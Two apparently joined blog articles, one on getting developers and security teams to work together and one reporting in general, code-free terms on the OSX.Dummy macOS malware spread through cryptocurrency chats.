When Developers and Cybersecurity Go To War

Some developers love to create crafty code, others utilize strange code bases or off-the-reservation services, all of which creates a running battle with cybersecurity teams trying to protect the business and users. Here’s how both can coexist in relative peace with a good balance between features and security.

Regardless of whether developers are building a Windows or Linux application, a mobile app, cloud service, chatbot, docker utility or progressive web app, great risks are often, sometimes unknowingly, being taken.

Cybersecurity teams know it can take just one weakness across the application or any service it touches to make the business or its customers vulnerable to hackers and their army of automated tools.

The risks come into play regardless of the history of the coding team. From rockstar developers to fresh-out-of-college graduates, missing one port reference, ignoring one internal rule or borrowing one dubious codelet that solves a problem can wreak havoc on the business.

Let’s Be Coding Friends

Both sides of the equation are under pressure, business leaders want their coders to churn out apps and tools to use or sell yesterday. That’s as cybersecurity teams are tasked with being as invisible and frictionless as possible, while protecting everyone from the armies of darkness beyond the firewall.

The key to success is clarity of message and a well-defined plan for each project. Security must play an equal part of the quality checklist that any project goes through. Many code shops are moving to the DevOps model, where modular, goal-based milestones mark the lifecycle of the project.

In tandem with agile development, they help move projects rapidly, but within a structurally-defined process for quality, goal-meeting and feature management. Add security to that list and a business can proceed to develop apps that meet all the company’s security requirements, tested for integrity and meet any industry or governmental standards.

To achieve this, both heads of security and the development teams need to be on the same page, highlighting the security-as-quality message. By building in security checks, code validation and training all developers in the aspects of vulnerabilities, along with regular check-ins along the way to completion, a secure outcome for the application is guaranteed.

Every Business Needs a Security Master

An increasingly common role in larger enterprises is a chief digital/information security officer (or similar). In any smaller business, someone suitably qualified needs to take on that role and be responsible for the reporting, cataloguing and management of security solutions, risks and flaws.

That person is an ideal focal point for getting the development teams in line with the security needs of the business. This person can be one of the development team, and with responsibility for any future issues is more likely to police the team’s efforts. To help build a strong bond between the two, when launching and development project, teams must follow the ground rules set by the security team.

The Rules of the Coding Road

Training lessons or days that highlight the need for security, what happens when it is ignored, and highlight the main and minor flaws in coding techniques that lead to hacks will help alert the developers to the risks, and highlight the issues.

Code bounties and rewards can help encourage developers to spot flaws across the project code base, and any business should offer company-wide training in spotting hacks, flaws and other ways that hackers could access native code.

These guidelines along with strong rules on “borrowed” code, use of outside services and other likely weakpoints will see any business develop stronger, secure applications.

New Threats to MacOS From Malware in Cryptocurrency Chats Could Turn Your Investment Dreams to Dust

The general perception that MacOS is a safe OS is increasingly under threat from waves of threats and a wide range of attack vectors that could impact any operating system. The latest threat sees crypto chats laden with malware to tempt those looking to make an online killing, but they could end up as another cyber victim.

By Chris Knight

The move to always online collaboration tools open up MacOS and all PC users to a new range of threats. Users can be talking online about areas of interest, such as cryptocurrency, a popular topic. All of a sudden, they are invited by an admin to download a command line code snippet as part of an intriguing crypto tool. Within seconds, their Mac can be infected by a nasty malware download that can allow for remote command execution.

Crypto is a hot target for hackers, either trying to gain a user’s account details or to replace the user’s account in mining software with the hackers, earning money for them. A recent McAfee Security Report (PDF) shows that cryptojacking attacks have risen by a hefty 629% in the opening months of 2018.

With thousands of coins seeking attention, looking to replicate the success of Bitcoin, and initial coin offerings (ICOs) competing with each other across a wide range of exchanges, there are millions of users looking to make a quick buck. This booming, free-for-all landscape is ripe for hackers to make a killing of their own.

Welcome OSX.Dummy

The early efforts as demonstrated by this recent attack are not particularly sophisticated (hence, the Dummy nickname). But, with people keen to make a profit on the latest crypto news, their guard may be down. The attack was originally reported by a Dutch security analyst and as with most threats, more sophisticated versions will be rapidly developed by better crackers to up the ante.

This latest threat is called OSX.Dummy and during the course of online chats, users are asked to download a code snippet, which becomes an unsigned download that can bypass the MacOS Gatekeeper protection tool.

Command line codes are quite common for bitcoin miners and others interested in crypto and alt coin currencies, so this type of discussion is not out of the ordinary. People use generic bitcoin miners to mine different currencies which often require patches, code updates and other tweaks to keep them working, with many open source projects open to malware injection or other risks.

The trouble is, hackers and scammers are not far behind on any legitimate post or forum. Slack, Twitter, Github messages and other chats are full of them, luring people in. Many are annoyances or obvious to avoid, but now hackers have set their sights on this market, the risk will only grow.

Hopefully, users will become more aware to the threats. But newcomers, tempted by the newer coins coming to market and with crypto currencies gaining wider interest, there will be a constant stream of them who will be at risk.

These non-technical users or experienced users who think they are safe, as they are using a Mac, and trying their luck at crypto could get stung in the process. OSX.Dummy might just be the first effort to take on Mac owners in this battle, but it won’t be the last. Mac owners can’t rely on Gatekeeper to remain safe, so will need all the other firewall, anti-intrusion and other tools to protect their networks.